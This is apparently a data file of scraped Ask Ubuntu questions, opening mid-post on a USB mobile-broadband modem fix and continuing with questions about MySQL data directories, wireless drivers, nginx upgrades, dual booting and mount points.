: id 04f3:0212 elan microelectronics corp. laser mouse < br > bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub < br > < br > then after removing the dongle i did this and got : appuraja @ appuraja-system-product-name : ~ $ dmesg | tail < br > [ 207.048903 ] usb 1-4 : new usb device strings : mfr=2 , product=3 , serialnumber=4 < br > [ 207.048909 ] usb 1-4 : product : mt6229 < br > [ 207.048914 ] usb 1-4 : manufacturer : network connect < br > [ 207.048919 ] usb 1-4 : serialnumber : 192101021136100 < br > [ 207.049560 ] usb-storage 1-4:1.0 : usb mass storage device detected < br > [ 207.051143 ] scsi8 : usb-storage 1-4:1.0 < br > [ 208.049695 ] scsi 8:0:0:0 : cd-rom usbmodem storage disk 6229 pq : 0 ansi : 0 ccs < br > [ 208.051794 ] sr1 : scsi3-mmc drive : 0x/0x caddy < br > [ 208.053540 ] sr 8:0:0:0 : attached scsi cd-rom sr1 < br > [ 208.060184 ] sr 8:0:0:0 : attached scsi generic sg4 type 5 < br > appuraja @ appuraja-system-product-name : ~ $ lsusb < br > bus 001 device 006 : id 2020:0002 < br > bus 001 device 003 : id 0781:556b sandisk corp. < br > bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub < br > bus 002 device 003 : id 0d8c:0201 c-media electronics , inc. cm6501 < br > bus 002 device 002 : id 04f3:0212 elan microelectronics corp. laser mouse < br > bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub < br > < br > oh ! i forgot to tell you this time i had left a sandisk cruzer edge 8gb pendrive in one usb port . edit ( 05/02/2014 12:30 pm ) : appuraja @ appuraja-system-product-name : ~ $ dmesg | tail & lsusb < br/ > [ 1 ] 21063 < br/ > [ 1519.068041 ] usb 1-2 : new high-speed usb device number 5 using ehci-pci < br/ > [ 1519.200920 ] usb 1-2 : new usb device found , idvendor=2020 , idproduct=0002 < br/ > [ 1519.200933 ] usb 1-2 : new usb device strings : mfr=2 , product=3 , serialnumber=4 < br/ > [ 1519.200939 ] usb 1-2 : product : mt6229 < br/ > [ 1519.200945 ] usb 1-2 : manufacturer : network connect < br/ > [ 1519.200950 ] usb 1-2 : serialnumber : 192101021136100 < br/ > [ 1519.201451 ] usbserial_generic 1-2:1.0 : the `` generic '' usb-serial driver is only for testing and one-off prototypes. < br/ > [ 1519.201458 ] usbserial_generic 1-2:1.0 : tell linux-usb @ vger.kernel.org to add your device to a proper driver. < br/ > [ 1519.201464 ] usbserial_generic 1-2:1.0 : generic converter detected < br/ > [ 1519.203272 ] usb 1-2 : generic converter now attached to ttyusb0 < br/ > bus 001 device 005 : id 2020:0002 < br/ > bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub < br/ > bus 002 device 003 : id 0d8c:0201 c-media electronics , inc. cm6501 < br/ > bus 002 device 002 : id 04f3:0212 elan microelectronics corp. laser mouse < br/ > bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub < br/ > [ 1 ] + done dmesg | tail < br/ > appuraja @ appuraja-system-product-name : ~ $ < br/ > edit : 07/02/2014 04:56 p.m . the issue is finally solved , i followed the complete instruction by azker mohamed , and the issue was already 99 % solved , i give him many thanks , but for him , thanks would be insufficient appreciation , he helped me a lot . by the grace of god , i suddenly discovered the following and issue is 100 % solved : 1 ) put the dongle plugged in , 2 ) start the computer with ubuntu , it searches for the devices attached , although you will not see the internal process . 3 ) never ever put a blank modem into any usb port , be equipped with a valid sim card and a freshly formatted ( you can use windows 7 also to format ) micro sd memory card . be sure you have sufficient internet balance , at least 10 mb , i recommend 30 mb , which will be useful when we will be testing the connection . put both of them into the respective slots . if your micro sd memory card is shown in the unity launcher , the problem is almost solved . 4 ) all the problem arises when your micro sd memory card is not shown in the unity launcher , so manage to show it , here is the process : open terminal by ctrl+meta+t then type sudo mount /dev/sr then hit 'tab key ' twice at least . if you see the options like sr0 sr1 then your card is detected but not mounted , you have to do it manually . /dev/sr0 is generally dvd-rw drive in my case , and /dev/sr1 is the required micro sd that all we need . do n't close the terminal and do : sudo mount /dev/sr1 if ubuntu says ' mount : ca n't find /dev/sr1 in /etc/fstab or /etc/mtab ' , do n't get anxiety , its normal . do : sudo eject /dev/sr1 your micro sd is immediately shown in the unity launcher , see it . 5 ) now in the same terminal do : sudo modprobe usbserial vendor=0x2020 product=0x0002 close the terminal . 6 ) start sakish3g and choose the following option one by one : a ) more option - > only switch modem ( if applicable ) . see whether it only says 'modem switched ' , if it says 'modem switched to 2020:0002 ' then there is surely some problem . b ) only setup modem ( switch+load module+setup tty ) , if it says 'modem setup residing on /dev/ttyusb0 . ' then you have one more level of success . if it gives some warning message , do n't bother even . its natural . it may ask you for your login password , submit it . c ) only prepare modem ( setup+pin unlock+register network+update hal ) , if it says 'modem on /dev/ttyusb0 is registered to unknown operator 40491 . ' do n't bother if any warning is shown . d ) at the top-right corner of your screen ( between ubuntu cloud and the sound icon ) network manager applet is present , click to select 'enable mobile broadband ' , already you may see the name of your network provider . wait for a few minute , let the blinking radar sign stop , then click the network provider 's name e.g. , airtel , bsnl , aircel etc . e ) open mozilla firefox , opera , google chrome , chrome browser etc. , or open software updater to check whether there are any updates available . the process is complete , but remember a few things : 1 ) you need the following programs : lsusb , usb_modeswitch , wvdial and data files for usb_modeswitch . 2 ) for the first time you need a freshly formatted micro sd maybe formatted with win7/xp , linux etc . 3 ) you need a valid connection ( sim card ) with sufficient balance . 4 ) if you plan to use the usb-modem with ubuntu even after a few hour later , it does n't matter , you may not use it if you do n't need it but plug it before booting , then unplug after boot up and setting it up . and again plug it when needed . device is already set up in memory . ubuntu searches for attached the devices at boot time so plug the device earlier the boot , if this not the case and you have just inserted the device while ubuntiu is running , you may need to re-boot the pc . 5 ) if you eject the micro sd card after setting up , your modem is still usable if you re-plug it , but you may need to do the following to access the micro sd drive in it : sudo mount /dev/sr1 sudo eject /dev/sr1 enjoy the internet .
414966	brightness and lock setting dissappeared from all settings panel	somehow i found that brightness and lock setting is missed from settings panel . all other settings are working properly . is there any way to bring it back ?
414971	using command line for operating on files and folders mounted on windows partition	i have a dual boot system with win8 and ubuntu saucy . can i use the command line to copy/move/edit/delete files and folders located on the windows partition ? how do i set the path to that ? ?
414972	mysql moving db problem	i am experiencing problems while trying to move my database files to another location . i 've tried approaches described here but was unsuccessful . so , here are steps that i tried from the very beginning : i had an old /var/lib/mysql/ dir with the following contents : ml/ debian-5.5.flag ibdata1* ib_logfile0* ib_logfile1* mysql/ mysql_upgrade_info* performance_schema/ test/ i 've copied this structure to another location , say , /media/disk/new_mysql . then i 've edited file /etc/mysql/my.cnf where i 've changed : datadir = /var/lib/mysql to datadir = /media/disk/new_mysql` the next step was editing /etc/apparmor.d/usr.sbin.mysqld where i 've put : /media/disk/new_mysql/ r , /media/disk/new_mysql/** rwk , then /etc/init.d/apparmor restart after that chown -r mysql : mysql /media/disk/new_mysql sudo /etc/init.d/mysql start i 'm getting 'failed ' status on start . in /var/log/syslog i can find : feb 3 19:17:01 s cron [ 17952 ] : ( root ) cmd ( cd / & & run-parts -- report /etc/cron.hourly ) feb 3 19:17:05 s /etc/init.d/mysql [ 18008 ] : 0 processes alive and '/usr/bin/mysqladmin -- defaults-file=/etc/mysql/debian.cnf ping ' resulted in feb 3 19:17:05 s /etc/init.d/mysql [ 18008 ] : # 007/usr/bin/mysqladmin : connect to server at 'localhost ' failed feb 3 19:17:05 s /etc/init.d/mysql [ 18008 ] : error : 'ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 2 ) ' feb 3 19:17:05 s /etc/init.d/mysql [ 18008 ] : check that mysqld is running and that the socket : '/var/run/mysqld/mysqld.sock ' exists ! feb 3 19:17:05 s /etc/init.d/mysql [ 18008 ] : why does it happen ? if i change all preferences in my.cnf and apparmor config back to original values , mysql starts normally .
414973	changing keyboard to include `` < - ''	how would i change a key on my keyboard to print `` < - '' , for r ? i understand how to change a key to either `` less '' or `` minus '' in the keyboard files , but how would i change a key to include both ?
414974	realtek rtl8192ce wireless slow intermittent access	i am a noob to linux and could use some help . after much searching and reading i have been able to connect my toshiba c665-s5177 to the internet . to do so i had to install the realtek drivers for wireless card rtl8192ce from the realtek website . the method of installation followed the readme file include with the driver ... make clean sudo su make make install reboot however , my internet connection is very slow and is continuously dropping and reconnecting . advice from some previous posts suggested running the wireless info script . the results from the script are linked here . the script was run while attached to the internet via ethernet , which works well . if you would like me to run the script again while connected to wireless i can do that .
414977	how can i as a root user manage folder owned by other users using ubuntu desktop ?	i need to copy files/folder to a folder but that is owned by another user , infact a installed application by me . so how do i get the rights to copy files/folder to that folder ? i want to do it via ubuntu desktop .
414979	usb stick format via nautilus	okay , so i was fooling around on ubuntu 13.10 , then noticed that when i right-click my usb stick in nautilus , i have a `` format '' option . when i click `` format '' , a new window opens and asks for what to do . i choose my options , then click on `` format '' . and then , nothing appends ... my usb drive is not formatted , and i do n't have anything asking for my password . i looked around , and found this thread , which is not helping , since the `` format '' option on right-click does not appear with nautilus started as super-user . any thoughts ? please note that i 'm not trying to format my usb-stick , i 'm trying to format it with the built-in nautilus action . edit : the `` format '' option in context menu is provided by gnome-disks . gnome-disks ca n't format my drive either . so far , i 've found using it one error error synchronizing after initial wipe : timed out waiting for object ( udisks-error-quark , 0 )
414990	how to enable hibernation in ubuntu ?	i have a dual boot pc with win8 & ubuntu . win 8 allows me to hibernate but in ubuntu i see no option . i tried sudo pm-hibernate following this answer but it did n't actually hibernated or shut down the system . how can i enable hibernation on this system ?
414994	ubuntu and multiple graphics cards	this question has been asked a lot before , but i am still having trouble following the tips . i have intel hd graphics 4000 ( inside an i7 3310qm ) and an nvidia gt630qm . what i basically want is to run everything over the intel , and only execute some programs over the nvidia ( to use cuda ) . what i tried : running the .run installer from the nvidia website , this gave an error and disabled nouveau for me . after rebooting it still complained about nouveau running . then i followed this answer and the answer directly after it . after rebooting i can safely get into x , but when trying to enter one of the tty 's , the computer freezes in a purple screen . this is a fresh ubuntu 13.10 install . please let me know if you need more information to help me solve the problem . i am pretty new to all this display manager and drivers for graphics cards , and i would love to learn from this ; ) ( eg what everything is , and how it is related , as it currently looks pretty blurred to me ) . edit : i found something else , my brightness buttons ( fn + f5/6 ) do n't work ( they did before , so i think it is related ) .
415000	oracle java 7 as default and one in the system ?	i got successfully installed oracle java on 12.04 and set it as default , i wanted to know is it safe and ok to remove icedtea and openjdk6 and all that belongs to it and stick only oracle java and if i ever want to re-install icedtea back later it will be ok ? this is my output : 0 /usr/lib/jvm/java-7-oracle/jre/bin/java 1062 auto mode 1 /usr/lib/jvm/java-6-openjdk-i386/jre/bin/java 1061 manual mode 2 * /usr/lib/jvm/java-7-oracle/jre/bin/java 1062 manual mode also what difference does it make manual or auto mode ? java version `` 1.7.0_51 '' java ( tm ) se runtime environment ( build 1.7.0_51-b13 ) java hotspot ( tm ) client vm ( build 24.51-b03 , mixed mode )
415003	how to install wifi drivers on mac book air ?	i have a new mac book air that i ( because of the tiny amount of storage on it ) booted it from an hhd . it is the latest version of ubuntu and it is working great on the laptop . the only problem is that i need to install a driver for the wifi card but the laptop does n't have a ethernet port . is there a way to download the driver some other way ?
415005	remote into desktop on ubuntu through ssh	so we have ssh access to a ubuntu server , and we need to setup some programs that require visual access , but we have no clue how to do this through ssh , any help ?
415007	installing trusty packages in saucy	the version of yate in saucy is giving me issues with pulseaudio and wanted to install a newer version , so i installed all the required debs from trusty to make yate-qt4 work . i have not run into any issues thus far and all seems to be working well , but will this give me issues with upgrading later on ?
415008	ubuntu 13.10 will only run from dvd after successful install on hd	installed ubuntu 13.10 from dvd to my hard drive . software installed successfully . screen said to restart computer . dvd door opened to give me disk . i restarted computer ( dell vostro 1500 ) computer offered choice of windows xp or ubantu . i chose ubantu . ubantu tried to start from hard drive , but failed . screen wanted dvd reinserted to run . why ca n't ubantu run solely from hd ? what do i need to do to make it run just from the hd where it was installed ?
415010	how to figure out why ftp is n't working ?	i tried setting up a ftp server on my netbook , but i can not connect to it . now i wonder how can i figure out what i did wrong . i have an apache2 server running on it to use with the domain ( domain.dnsdynamics.com ) , and i can connect to that . // edit : i can go to http : //domain.com , but not ftp : //domain.com what steps can i do to figure out whats going wrong ? edit : the network is connected via a d-link dir-615 router , under forwarded ports is 20 and 21 , both forwarded to my netbook with static ip . there is no firewall on the netbook installed . i 've tried connecting via internet and from lan . i 've tested via chrome and filezilla , both said no response . ( timeout for filezilla , page not found for chrome ) . going to the http : // works , ftp : // not edit2 : i have been trying vsftpd , which seems to be the default ftp server for ubuntu edit3 : the vsftpd.conf ( without comments ) . default version , i have done no changes to it so far . listen=yes local_enable=yes dirmessage_enable=yes allow_writeable_chroot=yes use_localtime=yes xferlog_enable=yes connect_from_port_20=yes chroot_local_user=yes chroot_list_enable=yes secure_chroot_dir=/var/run/vsftpd/empty rsa_cert_file=/etc/ssl/private/vsftpd.pem
415011	change custom theme 's desktop label	i 'm attempting to write a custom theme for 12.04 and would like to change the upper left-hand corner label for the desktop from `` ubuntu desktop '' to a simple icon . ( see image ) ) in looking through the theme directories , it seems as though this is set somewhere else . does anyone know where i might find it ?
415013	how to temporarily override a dns setting for a certain domain name to point to localhost ?	i need ubuntu to use a certain domain name to point to a localhost address temporarily . how could i confgure for that ?
415015	is it possible to pull data off a linux hard drive using windows 8.1 ?	my ubuntu laptop died recently and i 've pulled the hard drive out of it . i 'm trying to read the data on it from a windows 8.1 laptop but i do n't think its recognizing the file system . i 've tried installing an ubuntu virtualbox vm but it 's unable to detect the hard drive . i 'm currently unable to dual boot due to lack of blank cd 's ... is there a way to read the hard drive using windows 8.1 ?
415016	make file error , trying to install intel power gadget	i hope another ubuntu user has tried to run intel power gadget and knows what problem i am having . i am trying to install the power gadget , running the make file i get an error message : /usr/lib/power_gadget/rapl.c:516 : undefined reference to `log' this line refers to the line in a .c file : return ( log ( ( double ) ( time / rapl_time_unit ) ) - a_lnf [ f ] ) / ln2 ; is this log function being called correctly ? am i missing a dependency on my ubuntu setup ? is there perhaps a missing library file in my download ? thanks in advance for any help regards roz edit , the make file is below : cflags=-g all : rapl_lib_shared rapl_lib_static power_gadget_static rapl_lib_shared : gcc $ ( cflags ) -fpic -c msr.c cpuid.c rapl.c gcc $ ( cflags ) -shared -o librapl.so msr.o cpuid.o rapl.o rapl_lib_static : gcc $ ( cflags ) -c msr.c cpuid.c rapl.c ar rcs librapl.a msr.o cpuid.o rapl.o power_gadget_static : gcc $ ( cflags ) power_gadget.c -i . -l. -lm -o power_gadget ./librapl.a power_gadget : gcc $ ( cflags ) power_gadget.c -i . -l. -lm -lrapl -o power_gadget gprof : cflags = -pg gprof : all ./power_gadget -e 100 -d 60 > /dev/null 2 > & 1 gprof power_gadget > power_gadget.gprof rm -f gmon.out make clean clean : rm -f power_gadget librapl.so librapl.a msr.o cpuid.o rapl.o
415017	attempted to install ubuntu 13 from usb , instead booted busybox 1.20.2 ash	as a sort of project , i was attempting to install ubuntu 13 onto my 2008 vintage emachines emd620-5777 ( has an amd athlon 64 processor inside ) .note that i am entirely new to linux ( android included ) . i had used pen drive linux 's install tool to load ubuntu 13 onto a 4 gb flash drive . once i had loaded the iso onto the drive , i turned off the computer by holding the button down and turned it back on , pushed f10 to load the boot menu , and booted from the flash drive . ubuntu appeared to load correctly initially , but then did something and now i am stuck in a command line called busybox v1.20.2 ash . what happened , and how can i install/run ubuntu from my flash drive ?
415020	remove arrows on system tray menus in gnome	i 've recently upgraded to ubuntu 13.10 with gnome and have found the behaviour of the context menus on icons in the system tray behaves differently . for applets which normally have a large number of menu options ( e.g . notes in tomboy or files in dropbox ) rather than display all the menu icons now only 5 or 6 are displayed and up/down arrows are displayed to scroll to the rest . is it possible to revert this behaviour so all menu options are showing without the need to scroll ?
415023	connect : network is unreachable ? - ping	when i attempt to ping google 's dns or any outside the network i get connect : network is unreachable ? i ca n't update either which i put down to this i am new to networking ... and ubuntu . but these are results of some commands i thought might help ip a : 1 : lo : < loopback , up , lower_up > mtu 65536 qdisc noqueue state unknown link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo inet6 : :1/128 scope host valid_lft forever preferred_lft forever 2 : eth0 : < broadcast , multicast , up , lower_up > mtu 1500 qdisc mq state up qlen 1000 link/ether 00:0e:7f : a9:10:54 brd ff : ff : ff : ff : ff : ff inet 192.168.0.5/24 brd 192.168.0.255 scope global eth0 inet6 fe80 : :20e:7fff : fea9:1054/64 scope link valid_lft forever preferred_lft forever 3 : virbr0 : < no-carrier , broadcast , multicast , up > mtu 1500 qdisc noqueue state down link/ether 86:0b : cb:43:63 : a5 brd ff : ff : ff : ff : ff : ff inet 192.168.122.1/24 brd 192.168.122.255 scope global virbr0 mcserver @ helloworld : ~ $ vi /etc/resolv.conf : # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 192.168.0.5 nameserver 8.8.8.8 vi /etc/network/interfaces : # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 iface eth0 inet static address 192.168.0.5 netmask 255.255.255.0 network 192.168.1.0 broadcast 192.168.0.255 post-up iptables-restore < /etc/iptables.up.rules dns-nameservers 192.168.0.5 8.8.8 .
415024	mysql with ubuntu 13.10	i have a problem with mysql-server and client after a wrong configuration . i tried uninstalling both but i get an error when i uninstall mysql-server : start : job failed to start invoke-rc.d : inirscript mysql , action `` start '' failed how do i delete it and reinstall it ?
415026	windows games how do i code in to play on linux	i really want to switch to linux but i own a crap ton of windows games . and i would want to play them on my machine . is there anyway possible to play the newest titles on said ubuntu machine ? like what code would i need and how do i implement it .
415029	no sound after mounting /home	there is no sound after mounting /home from another hdd ( ntfs ) . the sound indicator is also vanished , so are the drivers ( sytem settings - > sound ) the sound indicator is only shown before log in . after log in the indicator is gone . i have tried so many things and searched google for more then a week now , installed ubuntu 3 times ... pls help , i do n't want to go back to windows if you need more info let me know
415031	editing mt2s files	i 'm trying to find alternative program ( s ) for importing/editing/converting video files from my sony camcorder . type of files is - mt2s . camcorder came with a program called sony picture browser ( pmb ) , which works only in windows . i can not install it with wine , so i searched for alternatives in ubuntu : vlc - can open files , edit them ( brightness , contrast , sharpen , ... ) - but i 'm having trouble with basic editing like cutting and joining files - i cut with option view/advanced controls - and then i can record desired part of file ... problem is , that you have to wait all the time it records file ... for joining files i have n't found right option avidemux - when i try to open mt2s file i get error message `` this looks like mpeg . do you want to index it ? `` ... if i say no , the file does n't open , if i say yes , there is another message `` if the file is using b-frames as reference it can lead to a crash or stuttering ... '' and it ofers me `` safe mode '' ... if i choose it video is sloow , if i do n't , it offer me option tool/rebuild frame and if i use it , then video is ok ... but that is way too complicated ( can i get mt2s files to open without that error messages ? ) shotwell - it opens files , but there is no option of cutting/joining files any ideas ?
415033	ca n't upgrade nginx on ubuntu 12.04	i 'm stuck on nginx version 1.1.19 ! following the instructions here http : //www.jeffmould.com/2013/10/19/upgrading-nginx-ubuntu-12-04/ i did : service nginx stop add-apt-repository ppa : nginx/stable apt-get update apt-get upgrade which output this : the following packages have been kept back : linux-headers-virtual linux-image-virtual linux-virtual mysql-client-5.5 mysql-server-5.5 mysql-server-core-5.5 nginx-common nginx-light 0 upgraded , 0 newly installed , 0 to remove and 8 not upgraded . and the version is still 1.1.19 . i tried rebooting the server , but that did not solve the problem . is nginx even being upgraded ( the held back line suggests it is n't ) ? if it is , is it being installed in a weird place ? using whereis and locate , i have n't been able to find an nginx binary of the latest version , so it seems like it 's just not upgrading at all for some reason . some more info that might be relevant : when i run apt-get install nginx it outputs : nginx is already the newest version .
415038	ubuntu 12.04 lts using rtl8188e wireless connection is flaky	i just did a ubuntu 12.04 lts dual boot on toshiba s55-a5358 laptop with windows 8 pre-installed . i had problems with dual boot so had to use boot-repair . also had problems with getting the wireless to work and this answer by chilli555 worked : ubuntu12.04 realtek rtl8188e wireless card not detected however the wireless on ubuntu 12.04 lts is very flaky , slow and drops . $ dmesg | grep rtl [ 7.282473 ] rtl8188ee 0000:02:00.0 : enabling device ( 0000 - > 0003 ) [ 7.289730 ] rtl8188ee : using firmware rtlwifi/rtl8188efw.bin [ 7.953254 ] ieee80211 phy0 : selected rate control algorithm 'rtl_rc' [ 7.953400 ] rtlwifi : wireless switch is on [ 594.241828 ] rtlwifi : rtl_watchdog_wq_callback ( ) : < 0-0 > ap off , try to reconnect now [ 928.494384 ] rtlwifi : rtl_watchdog_wq_callback ( ) : < 0-0 > ap off , try to reconnect now [ 1163.316277 ] rtlwifi : addbareq_rx ( ) : < 10000-1 > sta is null [ 1360.990311 ] rtlwifi : rtl_watchdog_wq_callback ( ) : < 0-0 > ap off , try to reconnect now the wireless on windows 8 works super fast and no drops . i need help in getting the wireless to work consistently and fast on ubuntu 12.04 . thank you in advance . as per chilli555 's comment : azhar @ azhar-satellite-s55-a : ~ $ cat /var/log/syslog | grep -e wlan -e reason | tail -n25 feb 4 11:56:51 azhar-satellite-s55-a kernel : [ 2629.951397 ] wlan0 : rx assocresp from c8 : cb : b8 : f0:76:70 ( capab=0x431 status=0 aid=8 ) feb 4 11:56:51 azhar-satellite-s55-a kernel : [ 2629.951794 ] wlan0 : associated feb 4 11:56:51 azhar-satellite-s55-a networkmanager [ 1368 ] : < info > ( wlan0 ) : supplicant interface state : associating - > associated feb 4 11:56:51 azhar-satellite-s55-a networkmanager [ 1368 ] : < info > ( wlan0 ) : supplicant interface state : associated - > 4-way handshake feb 4 11:56:51 azhar-satellite-s55-a networkmanager [ 1368 ] : < info > ( wlan0 ) : supplicant interface state : 4-way handshake - > completed feb 4 11:56:51 azhar-satellite-s55-a networkmanager [ 1368 ] : < info > ( wlan0 ) : roamed from bssid c8 : cb : b8 : f0:76 : f0 ( hub ) to c8 : cb : b8 : f0:76:70 ( hub ) feb 4 11:58:07 azhar-satellite-s55-a networkmanager [ 1368 ] : < info > ( eth0 ) : device state change : activated - > unavailable ( reason 'carrier-changed ' ) [ 100 20 40 ] feb 4 11:58:07 azhar-satellite-s55-a networkmanager [ 1368 ] : < info > ( eth0 ) : deactivating device ( reason 'carrier-changed ' ) [ 40 ] feb 4 11:58:08 azhar-satellite-s55-a networkmanager [ 1368 ] : < info > policy set 'hub ' ( wlan0 ) as default for ipv4 routing and dns . feb 4 11:58:08 azhar-satellite-s55-a networkmanager [ 1368 ] : < info > policy set 'hub ' ( wlan0 ) as default for ipv4 routing and dns . feb 4 11:59:42 azhar-satellite-s55-a kernel : [ 2800.378747 ] wlan0 : connection to ap c8 : cb : b8 : f0:76:70 lost feb 4 11:59:42 azhar-satellite-s55-a wpa_supplicant [ 1409 ] : ctrl-event-disconnected bssid=c8 : cb : b8 : f0:76:70 reason=4 feb 4 11:59:42 azhar-satellite-s55-a networkmanager [ 1368 ] : < info > ( wlan0 ) : supplicant interface state : completed - > disconnected feb 4 11:59:42 azhar-satellite-s55-a networkmanager [ 1368 ] : < info > ( wlan0 ) : supplicant interface state : disconnected - > scanning feb 4 11:59:43 azhar-satellite-s55-a kernel : [ 2801.758438 ] wlan0 : authenticate with c8 : cb : b8 : f0 : a7:10 feb 4 11:59:43 azhar-satellite-s55-a networkmanager [ 1368 ] : < info > ( wlan0 ) : supplicant interface state : scanning - > authenticating feb 4 11:59:43 azhar-satellite-s55-a kernel : [ 2801.777780 ] wlan0 : send auth to c8 : cb : b8 : f0 : a7:10 ( try 1/3 ) feb 4 11:59:43 azhar-satellite-s55-a kernel : [ 2801.781551 ] wlan0 : authenticated feb 4 11:59:43 azhar-satellite-s55-a kernel : [ 2801.785467 ] wlan0 : associate with c8 : cb : b8 : f0 : a7:10 ( try 1/3 ) feb 4 11:59:43 azhar-satellite-s55-a networkmanager [ 1368 ] : < info > ( wlan0 ) : supplicant interface state : authenticating - > associating feb 4 11:59:43 azhar-satellite-s55-a kernel : [ 2801.790905 ] wlan0 : rx assocresp from c8 : cb : b8 : f0 : a7:10 ( capab=0x431 status=0 aid=5 ) feb 4 11:59:43 azhar-satellite-s55-a kernel : [ 2801.791305 ] wlan0 : associated feb 4 11:59:43 azhar-satellite-s55-a networkmanager [ 1368 ] : < info > ( wlan0 ) : supplicant interface state : associating - > 4-way handshake feb 4 11:59:45 azhar-satellite-s55-a networkmanager [ 1368 ] : < info > ( wlan0 ) : supplicant interface state : 4-way handshake - > completed feb 4 11:59:45 azhar-satellite-s55-a networkmanager [ 1368 ] : < info > ( wlan0 ) : roamed from bssid c8 : cb : b8 : f0:76:70 ( hub ) to c8 : cb : b8 : f0 : a7:10 ( hub ) another comment , the wireless connection applet `` bars '' keep going up and down . fyi , this does not happen on windows 8 or my other ubuntu laptop ( asus ) also running 12.04 lts . also getting the following results : http : //paste.ubuntu.com/6875216/
415042	splash screen before ubuquity installer	i am using the ubuntu customization kit to build a customized linux distro . i am attempting to change the splash screen that appears before the ubiquity installer in lubuntu 13.10 . i have been able to change the plymouth splash screen that shows during boots and shutdowns/restarts . but not the one after the first screen that shows `` try lubuntu without installing '' / '' install lubuntu '' and before the ubiquity installer . i have searched through forums for the last 3 weeks and have not been able to find a solution for this . i am cust thank you in advance for any help in this . here is a video of the splash screen : http : //www.youtube.com/watch ? v=ciev60l3yqa & feature=youtu.be
415043	strange autocompletion behavior	well ... i 'm so confused , cause the only real problem in my case is freaking apostrophe ( ' ) . situation : expanding path variable influence word completion , based on whether was apostrophes in additional path or not . example : i have an exe file ( called `` deadbeef '' ) with appropriate exe rights , which path contains 2 apostrophes : /home/mallniya/hard'n'soft/soft/gnu-linux/portable/deadbeef-0.6.0 specialy for an experiment i put the same file to the /home/mallniya/hardnsoftaa/soft/gnu-linux/portable/deadbeef-0.6.0 if i export first path to the variable $ path there will be no autocompletion in bash , but will be in a second case . when i type in terminal first letters of program in exported directory dead [ tab ] there is no completion in first case , but when i use tab with the same word in second condition - it works . but if i type command `` deadbeef '' in first case manually - it also executes . moreover , both which and type commands tells , that exe file is existed in both case . so what 's the problem ? ? ? why bash process the apostrophes like this ?
415044	how to uninstall rubymine from ubuntu	i was trying to upgrade from rubymine 5.4.3.2.1 to 6 for that i was trying to uninstall rubymine 5.4.3.2.1 . i removed rubymine directory from where i installed rubymine . now everytime i need to run rubymine version 6 from the .sh file given in rubymine 6 . how to completely remove the rubymine and do a fresh installation . fyi.. there is no such file or folder called ~/library to remove .
415050	can not print on ubuntu 12.04 , canon printer	i am trying to print a pdf file ( or libreoffice writer ) by canon mf4400-series printer connected by usb to my laptop , i could add the printer but when i print a pdf it says the printing is stopped due to printer configuration error . i also used cups printing system , it shows `` stopped '' for the job . would you kindly tell me how to fix it ? thanks
415055	fresh 64bit install of 13.10 is not booting - core.img is shooting into void	initial state : installing 13.10 64bit on external 1tb usb hd /dev/sda ( sata is off in bios due to hd falure ; getting same error when sata is on ) . before install : http : //paste.ubuntu.com/6869437 when installing ubuntu using 'erase disk + use lvm ' option . after the install : http : //paste.ubuntu.com/6869796 booting into rescue mode shows : kernel panic - not syncing . no init found ... what looks logical assuming this value from the boot info : `` core.img is at this location and looks in partition 94 for . '' does it mean it is looking for nothing ? there are many different discussions on each individual issue but it seems to be all related to one problem : any idea what it may be and how to fix it ?
415057	how can i unistall this , unity-webapps-facebookmessenger ( 2.4.16+13.10.20131126-0ubuntu1 )	how can i unistall this , unity-webapps-facebookmessenger ( 2.4.16+13.10.20131126-0ubuntu1 ) , its the application that ubuntu asked my by itself to innstall when i typed facebook.com on my browser , and its impossible to unistall , i got an facebook-icon that is beneath app empathy , when i click on it redirects me to facebook through the mozilla , i checked for any facebook-messsenger addons on mozilla and there were none , i didnt like it , and its impossible to delete , please help me to unistall it !
415065	ubuntu server on a 32- bit non pae machine	i would like to install any version of ubuntu server on a fairly old machine to both test out ubuntu server and have a bit of fun . the problem i have encountered is that the machine does not have pae so all releases of ubuntu server that i have tried will not work with the computer . the computer is pretty unimpressive with the following stats : dell inspiron 700m processor : intel pentium-m 735 1.7ghz ram : 512mb hdd : 40gb graphics : intel graphics media accelerator 900 so is there anyway to get ubuntu server on this device ? if so , how ?
415067	can i change the file path of an external hd from media/ < user > to media/ ?	( edited this question : see below ) just upgraded from ubuntu 12.04 to 13.10 . i store all of my documents and projects on an external hard drive , and the upgrade process has added an extra sub-directory to the file-path . so , it used to be media/seagate and now it 's media/ < user > /seagate . i have a couple of layout projects where this change means that the links to images are now broken . rather than spend three hours reinserting them all , i was wondering if there was an easy process for changing the way an external hard drive is mounted ? i 've done a search for previous responses on this issue , and this thread ( default mount point changed for external hd ) asks my question exactly but does n't provide a solution . i 'd appreciate it if someone could point me in the direction of a step-by-step guide . i 'm new to ubuntu , comfortable following instructions if someone tells me what to write into terminal , but very inexperienced with technical solutions . thanks for any help you can give me . ( edits start here ) florian pointed me to his answer in the how to configure the default automount location ? thread . his answer worked perfectly : if you really need the automount disks to be mounted in /media/ you could try to replace /media/your_username with a symlink pointing to /media : sudo rmdir /media/your_username sudo ln -s /media /media/your_username however , once i 've done that , my hard drive 's name changes from 'seagate expansion drive ' to 'seagate expansion drive1 ' . to fix this , i tried using the 'disks ' utility ( as described in this answer : http : //askubuntu.com/a/297905/243082 ) . those instructions say to select the 'edit filesystem label ' menu option . i could n't find that . i could only find a menu option for 'edit filesystem ' . and when i selected that , the file system 's name showed up as 'seagate expansion drive ' ( missing the '1 ' i 'm trying to get rid of . ) does anyone know what i 'm missing ? ( i would have added this to the how to configure the default automount location ? thread , but it told me i needed 50 reputation to add a comment . ) thanks , steve
